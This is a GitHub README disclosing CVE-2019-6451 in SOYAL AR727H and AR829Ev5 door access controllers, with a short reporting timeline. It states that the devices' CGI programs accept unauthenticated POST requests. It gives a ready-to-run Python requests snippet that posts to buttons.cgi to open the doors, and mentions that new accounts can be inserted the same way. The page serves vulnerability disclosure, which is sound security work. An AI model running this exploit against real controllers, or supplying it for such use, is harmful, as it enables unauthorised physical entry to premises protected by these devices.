Skip to content
Branch: master
Find file History
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
..
Failed to load latest commit information.
pics
README.md

README.md

CVE-2019-6451

Timeline

  • January 15, 2019 reported to SOAYL
  • January 15, 2019 arranged meeting time for further discussions
  • January 16, 2019 CVE assigned

Affected Products

  • SOYAL-AR727H
  • SOYAL-AR829Ev5

Technical Details

On thoses devices, all CGI programs allow unauthenticated POST access.

if you know the proper parameters and format, anyone can make it work

like open the door or insert new account on the device

In the Direct Control tab, you can control the door directly.

replay with Burpsuite or send it by python code below

import requests

response = requests.post('http://IP/buttons.cgi', data={'btn_Node': '255',
    'btnOpenAllPulse': '+Action+',
    'btn_nameDI0': 'DI0',
    'btn_nameDI1': 'DI1',
    'btn_nameDI2': 'DI2',
    'btn_nameDI3': 'DI3',
    'btn_nameDO0': 'RelayOutput0',
    'delayDO0':'0',
    'btn_nameDO1': 'DO1',
    'delayDO1': '0',
    'btn_nameDO2': 'DO2',
    'delayDO2': '0',
    'btn_nameDO3': 'DO3',
    'delayDO3': '0'})

OPEN SESAME !!!

Discoverer

You can’t perform that action at this time.